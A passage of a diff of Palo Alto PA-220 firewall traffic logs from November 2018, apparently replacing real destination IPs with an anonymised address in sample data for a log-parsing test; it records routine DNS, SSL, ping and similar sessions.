States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 